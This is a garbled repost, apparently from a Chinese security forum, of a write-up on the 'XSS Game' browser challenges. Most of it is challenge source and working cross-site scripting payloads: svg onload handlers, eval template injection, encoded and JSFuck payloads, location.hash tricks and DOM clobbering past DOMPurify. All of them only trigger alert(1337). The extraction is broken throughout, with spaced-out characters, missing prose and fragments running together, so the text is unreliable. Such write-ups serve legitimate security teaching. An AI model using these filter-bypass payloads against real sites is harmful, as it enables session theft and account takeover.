[15721] 2020-08-12_XSSGame分析以及知识点总结

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-18
2020-08-12_XSSGame分析以及知识点总结 X S S   G a m e k e n m i c k   F r e e B u f   2 0 2 0 - 0 8 - 1 2 X S S   G a m e   X S S B y p a s s 姿 Y o u t u b e r X S S   G a m e X S S   B y p a s s X S S C h r o m e 1 .   M a   S p a g h e t 2 .   J e f f f 使 J S 3 .   U g a n d a n   K n u c k l e s 使 使 a u t o f o c u s o n f o c u s 4 .   R i c a r d o   M i l o s U R L 使 5 .   A h   T h a t s   H a w t ) ` H T M L H T M L H T M L U R L U R L 6 .   L i g m a J S F u c k J S F u c k J S 6 G i t h u b J S F u c k 7 .   M a f i a a l e r t ( 1 3 3 7 ) < ! - -   C h a l l e n g e   - - > < h 2   i d = " s p a g h e t " > < / h 2 > < s c r i p t >       s p a g h e t . i n n e r H T M L   =   ( n e w   U R L ( l o c a t i o n ) . s e a r c h P a r a m s . g e t ( ' s o m e b o d y ' )   | |   " S o m e b o d y " )   +   "   T o u c h a   M a   S p a g h e t ! " < / s c r i p t > < s v g   o n l o a d = a l e r t ( 1 3 3 7 ) > < ! - -   C h a l l e n g e   - - > < h 2   i d = " m a n a m e " > < / h 2 > < s c r i p t >         l e t   j e f f   =   ( n e w   U R L ( l o c a t i o n ) . s e a r c h P a r a m s . g e t ( ' j e f f ' )   | |   " J E F F F " )         l e t   m a   =   " "         e v a l ( ` m a   =   " M a   n a m e   $ { j e f f } " ` )         s e t T i m e o u t ( j e f f a l e r t ( 1 3 3 7 ) m a   =   " M a   n a m e   $ { j e f f } " - " - a l e r t ( 1 3 3 7 ) - " j e f f m a   =   " M a   n a m e   " - a l e r t ( 1 3 3 7 ) - " " - a l e r t ( 1 3 3 7 ) < ! - -   C h a l l e n g e   - - > < d i v   i d = " u g a n d a " > < / d i v > < s c r i p t >         l e t   w e y   =   ( n e w   U R L ( l o c a t i o n ) . s e a r c h P a r a m s . g e t ( ' w e y ' )   | |   " d o   y o u   k n o w   d a   w e y ? " ) ;         w e y   =   w e y . r e p l a c e ( / [ < > ] / g ,   ' ' )         u g a n d a . i n n e r H T M L   =   w e y < i n p u t > < > < i n p u t > " o n f o c u s = a l e r t ( 1 3 3 7 )   a u t o f o c u s = " < ! - -   C h a l l e n g e   - - > < f o r m   i d = " r i c a r d o "   m e t h o d = " G E T " >         < i n p u t   n a m e = " m i l o s "   t y p e = " t e x t "   c l a s s = " f o r m - c o n t r o l "   p l a c e h o l d e r = " T r u e "   v a l u e = " T r u e " > < / f o r m > < s c r i p t >         r i c a r d o . a c t i o n   =   ( r i c a r d o j a v a s c r i p t j a v a s c r i p t : a l e r t ( 1 3 3 7 ) < ! - -   C h a l l e n g e   - - > < h 2   i d = " w i l l " > < / h 2 > < s c r i p t >         s m i t h   =   ( n e w   U R L ( l o c a t i o n ) . s e a r c h P a r a m s . g e t ( ' m a r k a s s b r o w n l e e ' )   | |   " A h   T h a t ' s   H a w t " )         s m i t h   =   s m i t h . r e p l a c e ( / [ ( ` ) ] / g ,   ' ' ( a l e r t ( 1 3 3 7 ) & < ! - -     - - > < s v g   o n l o a d = " a l e r t ( 1 3 3 7 ) " > < ! - -   H T M L   - - > < s v g   o n l o a d = " & # x 6 1 ; & # x 6 C ; & # x 6 5 ; & # x 7 2 ; & # x 7 4 ; & # x 2 8 ; & # x 3 1 ; & # x 3 3 ; & # x 3 3 ; & # x 3 7 ; & # x 2 9 ; " > < ! - -   U R L   - - > % 3 C s v g % 2 0 o n l o a d % 3 D % 2 2 % 2 6 % 2 3 x 6 1 % 3 B % 2 6 % 2 3 x 6 C % 3 B % 2 6 % 2 3 x 6 5 % 3 B % 2 6 % 2 3 x 7 2 % 3 B % 2 6 % 2 3 x 7 4 % 3 B % 2 6 % 2 3 x 2 8 % 3 B % 2 6 % 2 3 x 3 1 % 3 B % 2 6 % 2 3 x 3 3 % 3 B % 2 6 % 2 3 x 3 3 % 3 B % 2 6 % 2 3 x 3 7 % 3 B % 2 6 % 2 3 x 2 9 % 3 B % 2 2 % 3 E / *   C h a l l e n g e   * / b a l l s   =   ( n e w   U R L ( l o c a t i o n ) . s e a r c h P a r a m s . g e t ( ' b a l l s ' )   | |   " N i n j a   h a s   L i g m a " ) b a l l s   =   b a l l s . r e p l a c e ( / [ A - Z a - z 0 - 9 ] / g ,   ' ' ) e v a l ( b a l l s ) [ ,   ] ,   ( ,   ) ,   ! ,   + / /   J S F u c k a l e r t ( 1 3 3 7 ) [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ / *   C h a l l e n g e   * / m a f i a   =   ( n e w   U R L ( l o c a t i o n ) . s e a r c h P a r a m s . g e t ( ' m a f i a ' )   | |   ' 1 + 1 ' ) m a f i a   =   m a f i a . s l i c e ( 0 ,   5 0 ) m a f i a   =   m a f i a . r e p l a c e ( / [ ` ' " + - ! [ ] ] / g i ,   ' _ ' ) m a f i a   =   m a f i a . r e p l a c e (
5 0 使 J S F u c k 使 p a y l o a d 使 U R L p a y l o a d 8 .   O k ,   B o o m e r 使 p a y l o a d 使 H T M L D O M J a v a S c r i p t D O M 使 便 D O M   C l o b b e r i n g X S S   G a m e H T M L p a y l o a d p a y l o a d H T M L + U R L J S F u c k a l e r t D O M   C l o b b e r i n g H T M L J a v a S c r i p t ` ' " + - ! [ ] _ a l e r t _ a l e r t a l e r t a l e r t # $ { p a y l o a d } l o c a t i o n . h a s h . s l i c e ( 1 ) / /   F u n c t i o n ( / A L E R T ( 1 3 3 7 ) / . s o u r c e . t o L o w e r C a s e ( ) ) ( ) / /   3 0 8 6 8 0 4 3 9 a l e r t e v a l ( 8 6 8 0 4 3 9 . . t o S t r i n g ( 3 0 ) ) ( 1 3 3 7 ) / /   U R L   # a l e r t ( 1 3 3 7 ) p a y l o a d e v a l ( l o c a t i o n . h a s h . s l i c e ( 1 ) ) < ! - -   C h a l l e n g e   - - > < h 2   i d = " b o o m e r " > O k ,   B o o m e r . < / h 2 > < s c r i p t >         b o o m e r . i n n e r H T M L   =   D O M P u r i f y . s a n i t i z e ( n e w   U R L ( l o c a t i o n ) . s e a r c h P a r a m s . g e t ( ' b o o m e r ' )   | |   " O k ,   B o o m e r " )         s e t T i m e o u t ( o k ,   D O M P u r i f y s e t T i m e o u t ( o k ,   2 0 0 0 ) o k o k D O M   C l o b b e r i n g o k i d = o k < d i v   i d = " o k " > < / d i v > a l e r t ( 1 3 3 7 ) o k < a > t o S t r i n g ( ) h r e f < a > h r e f p r o t o c o l : u r i h r e f j a v a s c r i p t : D O M P u r i f y m a i l t o ,   t e l ,   x m p p < a   i d = o k   h r e f = t e l : a l e r t ( 1 3 3 7 ) > - o n f o c u s a u t o f o c u s j a v a s c r i p t :

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则